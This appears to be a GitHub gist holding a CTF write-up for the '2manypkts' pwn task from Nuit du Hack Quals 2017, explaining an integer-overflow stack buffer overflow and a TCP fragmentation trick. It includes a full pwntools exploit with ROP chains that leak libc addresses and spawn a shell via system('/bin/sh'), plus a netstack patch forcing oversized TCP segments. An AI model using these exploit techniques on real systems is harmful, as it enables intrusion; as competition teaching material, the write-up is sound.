Skip to content

Instantly share code, notes, and snippets.

@WGH-
Last active April 4, 2017 18:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save WGH-/395d4f1d5e010dd50e700a2588efadb0 to your computer and use it in GitHub Desktop.
Save WGH-/395d4f1d5e010dd50e700a2588efadb0 to your computer and use it in GitHub Desktop.
2manypkts writeup (Nuit du Hack CTF Quals 2017)

The task is a remote x86_64 binary (both binary and libc were provided), and is marked with "pwn" and "network". So the goal is to exploit some vulnerability to obtain a shell.

They're actually two parts of the task, named 2manypkts-v1 and 2manypkts-v2 respectively.

The binary has somewhat trivial stack buffer overflow vulnerability. In the first part, you can just overflow the buffer up to (and beyond) main return address, and employ well-known ROP technique. The second part is harder: main never returns, but buffer can also overwrite some other variables, including several pointers to heap variables, which would allow to call realloc with arbitrary arguments. As we submitted the flag for the first part literally a minute before the game end, we didn't have time to solve the second part.

Why the task was tagged "network" as well, you might ask? The problem is that the buffer is rather large, about 57 kilobytes. The data is read into the buffer by means of read system call, and after that, it's moved to a different buffer. In other words, we have to fill entire buffer (and some extra ROP chain) in a single read call, which is obviously problematic in network conditions. The hint for the task stated that we should utilize some MTU and fragmentation tricks. Which we did, but it wasn't as simple.

Binary exploitation

The main loop of the binary allows user to input some data of the following types: "double", "int", "char", "long", "unsigned long".

The user inputs data type first, then integer number of elements (up to 14335 incl.), and then the data itself in binary.

The program is written in C++, and, judging by presence of strikingly similar functions, with extensive use of C++ templates.

Here are the (reverse-engineered) definitions of our classes:

template <typename T>
class TypeContainer {
  int fd;
  int n_reads;
  T *buffer;
  T tmp_buffer[14336];
  size_t elems_in_tmp_buffer;
  size_t elems_in_buffer;
};
 
class State {
  int fd;
  int n_reads;
  TypeContainer<double> s1;
  TypeContainer<char> s2;
  TypeContainer<long> s3;
  TypeContainer<unsigned long> s4;
  TypeContainer<int> s5;
};

A variable of type State is allocated directly on the stack of the main function.

The logic of the program is as follows:

After user gives the type and the number of the elements, the program reads data into tmp_buffer:

read(this->fd, this->tmp_buffer, nelems * sizeof(T));

The number of successfully read elements is then stored in this->elems_in_tmp_buffer variable. After that, elements are moved from temporary buffer to the "persistent" one:

this->buffer_ptr = (T *)realloc(
 this->buffer_ptr, 
 sizeof(T) * (this->nelems_in_tmp_buffer + this->nelems_in_buffer)
);
 
for (i = 0; i < this->nelems_in_tmp_buffer; ++i) {
  this->buffer_ptr[this->nelems_in_buffer + i] = this->tmp_buffer[i];
}
this->nelems_in_buffer += this->nelems_in_tmp_buffer;

The vulnerability lies in the way nelems is handled.

First of all, the number is checked like this: nelems < 14336, where nelems is a signed integer. Any negative number passes this check. This is, however, insufficient, as negative number becomes a large 64-bit unsigned integer, almost 2**64. When such number is passed into read system call, it immediately errors with EFAULT. For the curious, smaller sizes, even 2**32, do not cause immediate EFAULT, and will only fail once actual attempt to write to inaccessible page happens. You can find the exact reason in fs/read_write.c in the kernel source code. Look for mentions of EFAULT.

Secondly, the number is suspectible to integer overflow. Remember that in the read argument, nelems is actually multiplied by sizeof(T)? If nelems is exactly INT_MIN+1, and, say, we're dealing with 4-byte integers, nelems * 4 will overflow and become just 4. Likewise, INT_MIN+100000 becomes 400000 after multiplication.

This way, we can pass a negative number that passes the first check, and will become almost any number we want after integer overflow in read argument calculation.

The next steps are rather obvious. I decided to use two ROP chains. The first would leak contents of some GOT entry, which would defeat libc ASLR, and them jump back to main. The second ROP chain will simply call system("/bin/sh"), which offsets would be known.

So far, so good.

Networking part

The exploit reliably works locally.

But note that our payload has to be at least 14336*sizeof(int) = 57344 bytes long, and also a little bit more than that (it also has to contain comparatively small ROP chain).

When run over network, read tends to returns much smaller chunks of data than wanted, not overflowing our buffer. This was expected, as network stack is not going to wait until all data has arrived.

As mentioned above, the provided hint advises to mess with MTU and fragmentation.

We came up with this solution: we need to somehow craft large TCP segments, so they will fit our payload entirely. Large TCP segment will be encapsulated in equally large IP datagram. Such large IP datagrams are going to be fragmented (so they will be able to pass through typical 1500-ish MTU Ethernet).

The bottom line is, TCP/IP stack won't be able to pass TCP segment until IP datagram has been reassembleded entirely. This assures that all our payload arrives atomically. Although it doesn't guarantee large atomic "read" per se, in practice, this's exactly what happens (and what we want).

Now the question is, how to make our TCP/IP stack to behave that way? There's no way your typical unmodified Linux will assume that MTU on the entire path is larger than 57000.

After some fruitless attempts of modifiying MTU (which didn't have much effect on segment size), we decided to find an userspace TCP/IP stack that we can easily modify. And we found one.

It's google/netstack, written in Go.

You create a TUN interface, set IP, MTU, owner, and other settings. I will assume that the interface is configured with 10.1.1.1/24 IPv4 address.

Then you can use included program tun_tcp_connect as a netcat-like proxy.

# Usage: ./tun_tcp_connect <tun-device> <local-ipv4-address> <local-port> <remote-ipv4-address> <remote-port>
./tun_tcp_connect tun0 10.1.1.2 10000 163.172.102.12 30303

In this example, the program will assume the role of endpoint 10.1.1.2:10000, and will attempt to connect to 163.172.102.12:30303. The operating system will receive some packets from 10.1.1.2 arriving on interface with address 10.1.1.1/24 (which is not unlike what happens when you connect to some physical network, and other hosts try to use you as a router). All you need to do at this point is to enable routing from tun0 interface to public internet. As 10.1.1.1/24 is obviously a private network, you'll need a NAT as well.

EXTERNAL=eth0
INTERNAL=tun0
 
iptables -P FORWARD ACCEPT # default ACCEPT for FORWARD chain
iptables -t nat -A POSTROUTING -o $EXTERNAL -j MASQUERADE
 
sysctl net.ipv4.conf.${EXTERNAL}.forwarding=1
sysctl net.ipv4.conf.${INTERNAL}.forwarding=1

Initially, I made a mistake, and also included some conntracking in the iptables ruleset. For unknown reasons, it passed IP datagrams only up to 20000 bytes in size. We wasted a lot of time debugging it. Leaving only masquerade rule removed the weird limit.

iptables -P FORWARD DROP
iptables -A FORWARD -i $EXTERNAL -o $INTERNAL -m conntrack --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i $INTERNAL -o $EXTERNAL -j ACCEPT

To make google/netstack actually generate enormous TCP segments, we had to modify it a bit. The patch is attached below, and it's rather trivial.

#!/usr/bin/env python3
import socket
import subprocess
import time
import random
from pwn import *
BUFFER_SIZE = 14336
context.log_level = 'debug'
def attach_gdb():
import os
import signal
import pipes
gdb_commands = [
"tcatch exec",
"handle SIGSTOP nostop",
"continue",
"handle SIGSTOP stop",
#"b realloc",
#"b * 0x400E92",
"continue",
]
cmds = " ".join("-ex %s" % pipes.quote(c) for c in gdb_commands)
#os.system("tmux split-window -h %s" % pipes.quote("gdb -p %d %s" % (os.getpid(), cmds)))
return
os.system("urxvtc -e gdb -p %d %s" % (os.getpid(), cmds))
os.kill(os.getpid(), signal.SIGSTOP)
LOCAL = 1
if LOCAL:
libc = ELF("/lib64/libc.so.6")
p = process("./2manypkts", preexec_fn=attach_gdb)
else:
libc = ELF("libc.so.6")
p = process(["/home/wgh/go/bin/tun_tcp_connect", "lol0", "10.1.1.%d" % random.randint(2, 254), "11111", "163.172.102.12", "30303"], stderr=subprocess.DEVNULL)
bin_sh_offset = next(libc.search("/bin/sh\0"))
# double-sized (8 bytes)
EXTRA_ELEMENTS = 1
def compute_overflow_size(size, type_size):
INT_MIN = -(2**31)
return INT_MIN + size/type_size
def get_rop_chain1():
p = b""
p += p64(0x0000000000403663) # pop rdi, ret
p += p64(0x605048) # string addr
p += p64(0x400C10) # puts
p += p64(0x400E36) # main
return p
def get_rop_chain2(base):
p = b""
p += p64(0x0000000000403663) # pop rdi, ret
p += p64(base + bin_sh_offset) # string addr
p += p64(base + libc.symbols[b'system']) # puts
p += p64(0x400E36) # main
return p
chain1 = get_rop_chain1()
time.sleep(1)
p.sendline("int")
p.recvuntil("enter into int")
p.sendline("%d" % compute_overflow_size(14336*4 + 8+8 + 8+8+len(chain1), 4))
p.recvuntil("size :")
p.send(b"A"*(14336*4) + p64(0) + p64(0) + p64(0) + p64(0xdeadbeef) + chain1)
p.recvuntil("End data dump")
p.sendline("exit")
p.recvuntil("Exiting now!\n")
leaked_puts = u64(p.recv(6) + b'\0\0')
libc_base = leaked_puts - libc.symbols[b'puts']
log.info("Leaked puts: %016x", leaked_puts)
log.info("Libc base: %016x", libc_base)
chain2 = get_rop_chain2(libc_base)
p.sendline("int")
p.recvuntil("enter into int")
p.sendline("%d" % compute_overflow_size(14336*4 + 8+8 + 8+8+len(chain2), 4))
p.recvuntil("size :")
p.send(b"A"*(14336*4) + p64(0) + p64(0) + p64(0) + p64(0xdeadbeef) + chain2)
p.recvuntil("End data dump")
p.sendline("exit")
p.recvuntil("Exiting now!\n")
p.interactive()
diff --git a/tcpip/sample/tun_tcp_connect/main.go b/tcpip/sample/tun_tcp_connect/main.go
index ddd08da..3366ef5 100644
--- a/tcpip/sample/tun_tcp_connect/main.go
+++ b/tcpip/sample/tun_tcp_connect/main.go
@@ -60,7 +60,7 @@ func writer(ch chan struct{}, ep tcpip.Endpoint) {
r := bufio.NewReader(os.Stdin)
for {
- v := buffer.NewView(1024)
+ v := buffer.NewView(102400)
n, err := r.Read(v)
if err != nil {
return
diff --git a/tcpip/transport/tcp/connect.go b/tcpip/transport/tcp/connect.go
index 3871ec2..0a0986b 100644
--- a/tcpip/transport/tcp/connect.go
+++ b/tcpip/transport/tcp/connect.go
@@ -5,6 +5,8 @@
package tcp
import (
+ "os"
+ "fmt"
"crypto/rand"
"time"
@@ -384,12 +386,17 @@ func parseSynOptions(s *segment) (mss uint16, ws int, ok bool) {
}
}
+ fmt.Fprintf(os.Stderr, "Overriding MSS %v\n", mss)
+
+ mss = 65000
+
return mss, ws, true
}
func sendSynTCP(r *stack.Route, id stack.TransportEndpointID, flags byte, seq, ack seqnum.Value, rcvWnd seqnum.Size, rcvWndScale int) error {
// Initialize the options.
mss := r.MTU() - header.TCPMinimumSize
+ mss = 65000
options := []byte{
// Initialize the MSS option.
header.TCPOptionMSS, 4, byte(mss >> 8), byte(mss),
diff --git a/tcpip/transport/tcp/snd.go b/tcpip/transport/tcp/snd.go
index f9b6427..6dfcb95 100644
--- a/tcpip/transport/tcp/snd.go
+++ b/tcpip/transport/tcp/snd.go
@@ -284,7 +284,7 @@ func (s *sender) sendData() {
// into one segment if they happen to fit. We should do that
// eventually.
var seg *segment
- end := s.sndUna.Add(s.sndWnd)
+ end := s.sndUna.Add(s.sndWnd).Add(0x40000)
for seg = s.writeNext; seg != nil && s.outstanding < s.sndCwnd; seg = seg.Next() {
// We abuse the flags field to determine if we have already
// assigned a sequence number to this segment.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment